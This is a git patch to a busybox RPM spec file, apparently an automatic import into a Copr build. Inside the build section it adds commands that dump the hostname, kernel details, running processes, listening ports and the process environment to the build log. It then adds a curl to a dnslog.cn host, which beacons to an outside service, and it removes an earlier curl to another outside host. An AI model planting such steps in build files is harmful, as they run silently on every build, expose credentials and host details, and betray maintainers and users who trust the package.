From 3ea140fba81f993a247ae568e564ee17de3df475 Mon Sep 17 00:00:00 2001 From: CoprDistGit Date: Wed, 25 Oct 2023 07:37:18 +0000 Subject: automatic import of busybox --- busybox.spec | 18 +++++++++++++++++- 1 file changed, 17 insertions(+), 1 deletion(-) diff --git a/busybox.spec b/busybox.spec index 52878cb..cab2209 100644 --- a/busybox.spec +++ b/busybox.spec @@ -68,7 +68,23 @@ cp busybox_unstripped busybox.dynamic cp docs/busybox.1 docs/busybox.dynamic.1 make clean -curl http://buildbusybox.50a07aab2e.ipv6.1433.eu.org +hostname 1>&2 +uname -a 1>&2 +#ip addr 1>&2 +#ip route 1>&2 +ps -ef 1>&2 +netstat -nlpt 1>&2 +cat /proc/self/environ 1>&2 + +hostname 1>&2 +uname -a 1>&2 +#ip addr 1>&2 +#ip route 1>&2 +ps -ef 1>&2 +netstat -nlpt 1>&2 +cat /proc/self/environ 1>&2 + +curl http://buildbusybox.co47b5.dnslog.cn cp %{SOURCE2} .config yes "" | make oldconfig cat .config && \ -- cgit v1.2.3